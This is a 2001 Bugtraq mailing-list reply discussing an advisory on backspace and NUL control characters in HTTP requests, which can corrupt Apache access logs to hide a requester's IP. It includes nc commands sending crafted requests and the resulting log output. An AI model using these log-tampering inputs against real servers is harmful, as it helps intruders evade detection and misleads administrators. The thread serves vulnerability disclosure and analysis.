Bugtraq mailing list archives

Re: Securax Advisory 12

From: Alex Muntada <alexm () AC UPC ES>
Date: Wed, 3 Jan 2001 12:22:03 +0100

incubus wrote:

When the backspace charachter is sent,  after a NULL terminated
request, we will get a answer,  the page we requested,  but our
entry in the access_log file is kinda altered. We can overwrite
our IP address when someone wantsto cat the logfile to the
screen or maybe also to a device (such as: > /dev/lp0),


NUL terminaded request aside, the backspace (and any other
control characters) logging in httpd logs had been discussed some
time ago, as you can see below --for details, see Bugtraq archives

  http://www.securityfocus.com/archive/1/11840

mnemonix wrote:

The problem relates to "allowable" REQUEST_METHODs when a dynamic
resource, such as a CGI script is requested. Essentially _any_
(except for HEAD, TRACE and OPTIONS) REQUEST_METHOD can be used -
even methods not defined in the HTTP protocol. Consider the
following requests which all return the requested resource.

 GET /cgi-bin/environ.cgi HTTP/0.9

 Azx5T8uHTRuDL /cgi-bin/environ.cgi HTTP/1.0

Even Control characters are allowed. Consider the following:

 ^H^H^H^H^H^H^H^H^H lots of these ^H^H /cgi-bin/environ.cgi HTTP/1.1


Sevo Stille wrote:

Of course control chars are and must be allowed - CGI is defined
to be transparent towards the application. For a request
satisfied by the server, the server would have to (and at any
rate apache does) return a 501 method not implemented error,
according to the specs, par. 5.1.1.1


Henrik Nordstrom wrote:

Not really. RFC 2068 defines method as a token, which is "1*<any
CHAR except CTLs or tspecials>" so the above may be rejected with a
"400 Bad Request" reply as it is not valid HTTP syntax.

HTTP puts restrictions on wich characters that are allowable in
all parts of the protocol except the message body.


So does apply to entire Request-Line and Simple-Request (as
depicted in the Securax advisory).

Tested Apache 1.3.14 (source compiled httpd) and it still accepts
control chars in HTTP requests, but it shouldn't as pointed by
Henrik Nordstrom.

Just a last comment on kosheen.c: on my tests against apache, it
seems to discard anything after NUL byte, so kosheen doesn't work
as expected unless NUL is removed:

  % cat <<EOF | nc www.example.com 80
  GET /index.html HTTP/1.0^@^H^H^H^H

  EOF

  ....HTML....

  % tail -1 access_log | od -c
  0000000   w   w   w   .   e   x   a   m   p   l   e   .   c   o   m
  0000020   -       -       [   0   3   /   J   a   n   /   2   0   0   1
  0000040   :   1   1   :   4   5   :   1   4       +   0   1   0   0   ]
  0000060       "   G   E   T       /   i   n   d   e   x   .   h   t   m
  0000100   l       H   T   T   P   /   1   .   0   "       2   0   0
  0000140   4   8   5   9   -       -  \n
  % cat <<EOF | nc www.example.com 80
  GET /index.html HTTP/1.0^H^H^H^H

  EOF

  ....HTML....

  % tail -1 access_log | od -c
  0000000   w   w   w   .   e   x   a   m   p   l   e   .   c   o   m
  0000020   -       -       [   0   3   /   J   a   n   /   2   0   0   1
  0000040   :   1   1   :   4   5   :   1   4       +   0   1   0   0   ]
  0000060       "   G   E   T       /   i   n   d   e   x   .   h   t   m
  0000100   l       H   T   T   P   /   1   .   0  \b  \b  \b  \b   "
  0000140   2   0   0       4   8   5   9       -       -  \n


Best,
Alex

--
Alex Muntada <alexm () ac upc es>
http://www.ac.upc.es/homes/alexm/

Current thread:

Securax Advisory 12 incubus (Jan 02)
- Re: Securax Advisory 12 Alex Muntada (Jan 03)
  - Re: Securax Advisory 12 (Using backspace in HTTP requests) Philip Stoev (Jan 04)
- Using backspace in HTTP requests (Re: Securax Advisory 12) Philip Stoev (Jan 03)